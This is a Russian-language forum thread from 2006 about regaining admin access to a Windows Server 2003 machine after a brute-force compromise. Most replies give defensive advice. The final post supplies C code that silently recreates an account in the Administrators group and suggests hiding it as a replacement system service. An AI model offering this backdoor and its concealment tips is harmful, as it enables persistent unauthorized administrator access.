Возможность получения пароля, в винде 2003 / Windows

ReSQL.ru

Мобильная версия Контакт Правила FAQ Помощь

Гость

Войти | Регистрация | Профиль | Очистить

Новые сообщения | Избранное

Форумы | Пользователи | Статистика | Мод. лог | Поиск

Цитировать

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вложение:

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Доб. в избранное | Игнор. тему | Прикреп. тему | Пометить прочит. / непрочит. | Фильтр

Форумы / Windows [игнор отключен] [закрыт для гостей] / Возможность получения пароля, в винде 2003

25 сообщений из 27, страница 1 из 2

все

Возможность получения пароля, в винде 2003

#33593999

Автор Темы_

Гость

У нас так один раз было, что сломали сервер, т.е. пришлось заново ось переставлять, что не есть очень приятно.
Притом сначала просто мы не смогли зайти на сервер, т.к. не изменили пароль админа.
Всвязи с этим появилась такая идея:
Сделать на каком нить сайтике, который у нас лежит, такой скрипт, который бы выдавал пароль админа, т.к. выполнятся будет под ним ( скрипт выполнятся ).

Конечно понимаю что с одной стороны это идея глупая, но вот хотелось бы осуществить.

Ось - 2003 сервер. Т.к. наш, то права любые.

...

Рейтинг:

0 / 0

10.03.2006, 23:01

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594033

--null--

Участник

Откуда: Санкт-Петербург

Сообщения: 2 915

Рейтинг: 0 / 0

Лучше понять, почему взломали. и устранить причину взлома.
Виндоус что ли в инет глядит без файрвола? ;-)
А "скрипт" такой сделать нельзя, пароль не выдаст,конечно, можно сделать скрипт, котрый создаст нового админа или т.п., но во-первых это несекурно (еще раз взломают с таким подходом) - а во-вторых злодеи и это вычислят, если захотят.
Простейший вариант - иметь резервного юзера - админа.

Возврат пароля админу - с разными Windows это рассматривалось и 2003 тоже вроде
поиск рулит

...

Рейтинг:

0 / 0

11.03.2006, 00:21

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594049

Автор темы_

Гость

Как сломали - брутом.
Хочется именно удаленным способом есть ли возможность?!

...

Рейтинг:

0 / 0

11.03.2006, 00:49

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594069

--null--

Участник

Откуда: Санкт-Петербург

Сообщения: 2 915

Рейтинг: 0 / 0

2003 сервер можно сломать брутом ???
Я серьезно спрашиваю, мало ли что.
Пароль был не пустой, надеюсь?

Можно, например, написать сервис, который при получени определенного пакета с определенного адреса создаст пользователя в группе Administrators
с известным паролем. То есть как бы подложить себе же трояна на всякий случай :-)
Но это - абсолютно неверный путь, внедрять его на практике не надо!
Надо разобраться, почему сломали, установить патчи, нормальные пароли, файрвол, политики учетных записей и прочее.
Аудит настроить, алерты отбрасывать, когда какая-нить сволочь ломится.
Зря что ли контора дяди Билла столько механизмов безопасности напридумала?

...

Рейтинг:

0 / 0

11.03.2006, 01:42

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594189

Anatoly Podgoretsky

Участник

Сообщения: 63 997

Рейтинг: 0 / 0

--null--2003 сервер можно сломать брутом ???
Я серьезно спрашиваю, мало ли что.
Пароль был не пустой, надеюсь?
Брутом можно сломать что угодно.
Особенно если пароль входит в список.

...

Рейтинг:

0 / 0

11.03.2006, 08:52

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594191

aleks2

Участник

Сообщения: 12 453

Рейтинг: 0 / 0

Anatoly Podgoretsky --null--2003 сервер можно сломать брутом ???
Я серьезно спрашиваю, мало ли что.
Пароль был не пустой, надеюсь?
Брутом можно сломать что угодно.
Особенно если пароль входит в список.

Да, но если для этого потребуется 10 лет, то можно спать спокойно.

1) Политика блокировки уч. записи.
2) Политика запрета дистанционного(ых) логонов администраторов.
---------------
и спите спокойно.

!) ГЛАВНОЕ: в Windows2000/2003 пароли могут быть длиннее 14 символов (намного).

...

Рейтинг:

0 / 0

11.03.2006, 09:01

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594199

Anatoly Podgoretsky

Участник

Сообщения: 63 997

Рейтинг: 0 / 0

aleks2Да, но если для этого потребуется 10 лет, то можно спать спокойно.
Ты добрый
Увеличь на несколько степеней порядок.
Только подбор по словарю может снизить это время с миллионов лет, да и то как ты сказал политика поможет, при том поможет во всех случаях. 10 ошибок и блокировка на 30 минут.

...

Рейтинг:

0 / 0

11.03.2006, 09:18

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594200

Anatoly Podgoretsky

Участник

Сообщения: 63 997

Рейтинг: 0 / 0

Ради интереса могу подсчитать, только предоставь следующие данные - входной словарь, длина пароля и количество подборов в секунду (для сервера это очень маленькая величина).

...

Рейтинг:

0 / 0

11.03.2006, 09:20

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594206

Green2

Участник

Сообщения: 14 172

Рейтинг: 27 / 0

у меня как то студенты взломали пароль за неделю (на Win XP)
по словарю пароль абсолютно не подбирался. Чистый перебор.
--

Posted via ActualForum NNTP Server 1.3

...

Рейтинг:

0 / 0

11.03.2006, 09:56

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594218

Anatoly Podgoretsky

Участник

Сообщения: 63 997

Рейтинг: 0 / 0

Значит был короткий пароль или маленький входной алфавит.

...

Рейтинг:

0 / 0

11.03.2006, 10:25

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594220

Green2

Участник

Сообщения: 14 172

Рейтинг: 27 / 0

2 Anatoly Podgoretsky
студенты знали сколько символов было в пароле и может даже некоторые буквы.
--

Posted via ActualForum NNTP Server 1.3

...

Рейтинг:

0 / 0

11.03.2006, 10:27

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594224

Anatoly Podgoretsky

Участник

Сообщения: 63 997

Рейтинг: 0 / 0

Первое не меняет роли, при большом входном алфавите и достаточной длине, а вот второе снижает длину кардинально. Для интереса рассмотрим ситауцию при следудующих предпосылках

1. алфавит - 26 больших, 26 маленьких ангийских букв, плюс 10 цифр 0 итого 62 символа в алфавите.
2. длина пароля 8 символов.
3. скорость подбора - 1 000 000 паролей в секунду

имеем 2527 дней на полный перебор.
при длине пароля в 9 символов уже имеем 156674 дней и так далее.

...

Рейтинг:

0 / 0

11.03.2006, 10:33

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594227

Anatoly Podgoretsky

Участник

Сообщения: 63 997

Рейтинг: 0 / 0

Green2у меня как то студенты взломали пароль за неделю (на Win XP)
по словарю пароль абсолютно не подбирался. Чистый перебор.
И еще я думаю, что они подбирали его на том же XP? или по сети?

...

Рейтинг:

0 / 0

11.03.2006, 10:35

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594230

Green2

Участник

Сообщения: 14 172

Рейтинг: 27 / 0

взяли копию реестра и там хеш с паролем.
--

Posted via ActualForum NNTP Server 1.3

...

Рейтинг:

0 / 0

11.03.2006, 10:42

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594239

Автор Темы_

Гость

--null--2003 сервер можно сломать брутом ???
Я серьезно спрашиваю, мало ли что.
Пароль был не пустой, надеюсь?

Можно, например, написать сервис, который при получени определенного пакета с определенного адреса создаст пользователя в группе Administrators
с известным паролем. То есть как бы подложить себе же трояна на всякий случай :-)
Но это - абсолютно неверный путь, внедрять его на практике не надо!
Надо разобраться, почему сломали, установить патчи, нормальные пароли, файрвол, политики учетных записей и прочее.
Аудит настроить, алерты отбрасывать, когда какая-нить сволочь ломится.
Зря что ли контора дяди Билла столько механизмов безопасности напридумала?
Ну блин, естественно сделаем веб-приложением с входом, с большим паролем который не зависит от паролей системы, а далее так, далее если человек залогинился то для него создаем такого пользователя.
Где можно посмотреть как это сервис написать?! Т.е. как бы сам то сервис я напишу, а вот именно механизм добавления неясен.

...

Рейтинг:

0 / 0

11.03.2006, 11:01

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594245

Anatoly Podgoretsky

Участник

Сообщения: 63 997

Рейтинг: 0 / 0

Green2взяли копию реестра и там хеш с паролем.
Тогда они погорячились, для этого надо иметь права администратора, а в этом случае ничего взламывать не надо. Или они у тебя утянули винчестер?

...

Рейтинг:

0 / 0

11.03.2006, 11:11

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594288

--null--

Участник

Откуда: Санкт-Петербург

Сообщения: 2 915

Рейтинг: 0 / 0

это ж какой должен быть пароль, чтобы брутом сломали :-)

Автор Темы_Где можно посмотреть как это сервис написать?! Т.е. как бы сам то сервис я напишу, а вот именно механизм добавления неясен.

посмотрите функции API

NetUserAdd
NetGroupAddUser

их вполне для Вашей задачи достаточно. а потом - сервис, слушаем TCP
или принимаем UDP пакет - и вперед. Троян готов :-)

Но не проще ли нормальную политику настроить: переименовать админа и придумать ему сложный пароль?
Ну и пароль подобрать такой, чтобы словарная атака не проходила - ничего сложного, как это сделать - написано в любой нормальной книжке про сетевую безопасность.

Еще чтобы не рассчитывать впредь всякие страшные цифири в днях про взлом паролей - напомню, что соблюдение графика смены паролей рулит.
Скажем, смена админского пароля везде раз в месяц - не должна напрягать, раз за безопасность опасаемся.

...

Рейтинг:

0 / 0

11.03.2006, 12:13

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594339

Green2

Участник

Сообщения: 14 172

Рейтинг: 27 / 0

Реестр утянуть просто, если можно загрузится с дискеты. Даже NTFS непомогло только создало затруднения с поиском драйвера.

...

Рейтинг:

0 / 0

11.03.2006, 13:31

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594350

Anatoly Podgoretsky

Участник

Сообщения: 63 997

Рейтинг: 0 / 0

Это как?
Загрузка должна быть разрешена только с HDD, на биос должен быть поставлен пароль. Только физический взлом компьютера.

...

Рейтинг:

0 / 0

11.03.2006, 13:45

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594368

Di_LIne

Участник

Откуда: Тропик Скорпиона

Сообщения: 48 256

Рейтинг: 0 / 0

К общей теме:
Автор Темы_
естественно сделаем веб-приложением с входом
имхо - это еще одна дыра в безопасности.
От какой учетной записи должна крутиться софтинка?
SYSTEM? Ну-ну...
веб-приложения тож подлежат взлому.
брутфорсить их еще легче, чем админскую запись. (см. ниже)
Итого: - имхо, идей НЭ правельный.
Выше приводили разумные решение:
Файрвол+Длин-нющий пароль на ADMINISTRATOR+Блокировка попыток+
Резервный юзер с правами админа.

Anatoly Podgoretsky10 ошибок и блокировка на 30 минут.
имхо и 3 попыток достаточно для блокировки.
Если с 3-х не попал: Или админ пьян, что уже криминал , или ломяться.

...

Рейтинг:

0 / 0

11.03.2006, 14:16

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594606

Автор темы_

Гость

А теперь в натуре, просто надо сделать дырочку в безопасности чисто для себя :-).
Вот и уточнял :-)
Уже практически всё сделал, только пока точно ещё не определился, что будет удобнее:
1.Скачал прогу, которая если ты сидишь под админискими правами дает тебе возможность у кого хошь менять пароли.
2.Либо написать свой сервис?!
Я конечно, как программер руками и ногами за второе, но как это реализовать не знаю, подкините идею :-)

...

Рейтинг:

0 / 0

11.03.2006, 21:27

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594609

Green2

Участник

Сообщения: 14 172

Рейтинг: 27 / 0

2 Автор темы_
http://winternals.com/Products/AdministratorsPak/
--

Posted via ActualForum NNTP Server 1.3

...

Рейтинг:

0 / 0

11.03.2006, 21:35

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594614

--null--

Участник

Откуда: Санкт-Петербург

Сообщения: 2 915

Рейтинг: 0 / 0

автор1.Скачал прогу, которая если ты сидишь под админискими правами дает тебе возможность у кого хошь менять пароли

а зачем для этого прога, разве это и так нельзя делать?

...

Рейтинг:

0 / 0

11.03.2006, 21:50

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594826

Автор Темы_

Гость

Обусняю, хочу сделать скиптягу, которая вызывается через web и
через dsadd user в консоле добавляет юзера, только вот с
dsadd user для домена не могу разобраться, если кто то сталкивался, напишите небольшой работающий примерчик, я вчера около часа пытался разобраться - никак :-(.
Т.е. помогите с этой прогой :-)

...

Рейтинг:

0 / 0

12.03.2006, 11:45

| Ответить | Цитировать | Написать

Возможность получения пароля, в винде 2003

#33594859

--null--

Участник

Откуда: Санкт-Петербург

Сообщения: 2 915

Рейтинг: 0 / 0

Сдается мне - ты просто backdoor пишешь или трояна :-)
Вот фрагмент кода - когда-то сам таким страдал, правда только на NT4/W2k проверено. Пишешь - сервис, который сносит какой-нибудь не очень нужный системный и вместо него встает в CurrentControlSet-е. Многие админы не замечают или замечают слишком поздно.
Учти, что твои действия могут попадать под статью УК :-)

Код: plaintext

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.
65.
66.
67.
68.
69.
70.
71.
72.
73.
74.
75.

#define UNICODE  1 

#include<windows.h>
#include <lmcons.h>
#include <lmaccess.h>
#include <lmerr.h>
....

void DeleteUser(char * username)
{
	LPWSTR unicode_username=(LPWSTR)malloc(strlen(username)*sizeof(WCHAR));
	MultiByteToWideChar(CP_ACP, 0 ,
					username,strlen(username),
					unicode_username,strlen(username)*sizeof(WCHAR));
	NetUserDel(NULL,unicode_username);
	free(unicode_username);
}


void CreateUser(char * username, char * password)
{

LPWSTR unicode_username=(LPWSTR)malloc(strlen(username)*sizeof(WCHAR));
LPWSTR unicode_password=(LPWSTR)malloc(strlen(password)*sizeof(WCHAR));
MultiByteToWideChar(CP_ACP, 0 ,
					username,strlen(username),
					unicode_username,strlen(username)*sizeof(WCHAR));

MultiByteToWideChar(CP_ACP, 0 ,
					password,strlen(password),
					unicode_password,strlen(password)*sizeof(WCHAR));



	USER_INFO_1               user_info;
    LOCALGROUP_MEMBERS_INFO_3 localgroup_members;
    LPWSTR                    lpszPrimaryDC = NULL;
    NET_API_STATUS            err =  0 ;
    DWORD                     parm_err =  0 ;

	//LPWSTR lpszDomain
    //LPWSTR lpszUser=(unsigned short *)username;
    //LPWSTR lpszPassword=(unsigned short *)password;
    LPWSTR lpszLocalGroup=TEXT("Администраторы");

	/* Set up the USER_INFO_1 struct */

    user_info.usri1_name = unicode_username;
    user_info.usri1_password = unicode_password;
    user_info.usri1_priv = USER_PRIV_USER;
    user_info.usri1_home_dir = TEXT("");
    user_info.usri1_comment = TEXT("");
    user_info.usri1_flags = UF_SCRIPT;
    user_info.usri1_script_path = TEXT("");

	NetUserDel(NULL,unicode_username);
//для гарантии удалим сначала юзера
//админ порадуется, когда заблокированный аккаунт "восстанет из ада"
	
      

	NetUserAdd( NULL,       
                 1 ,                   
                (LPBYTE)&user_info,  
                 &parm_err );         

	localgroup_members.lgrmi3_domainandname = unicode_username;

	NetLocalGroupAddMembers( NULL,        
                                   lpszLocalGroup,       
                                    3 ,                   
                                   (LPBYTE)&localgroup_members, 
                                    1  );        
	free(unicode_username);
	free(unicode_password);
}

...

Рейтинг:

0 / 0

12.03.2006, 12:42

| Ответить | Цитировать | Написать

25 сообщений из 27, страница 1 из 2

все

Форумы / Windows [игнор отключен] [закрыт для гостей] / Возможность получения пароля, в винде 2003

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=26&fpage=476&tid=1510921]:	0ms
get settings:	9ms
get forum list:	15ms
check forum access:	3ms
check topic access:	3ms
track hit:	77ms
get topic data:	15ms
get forum data:	3ms
get page messages:	87ms
get tp. blocked users:	2ms
others:	207ms

total:	421ms

	Необходимые cookie
	Cookie для сбора статистики
	Cookie для маркетинга и рекламы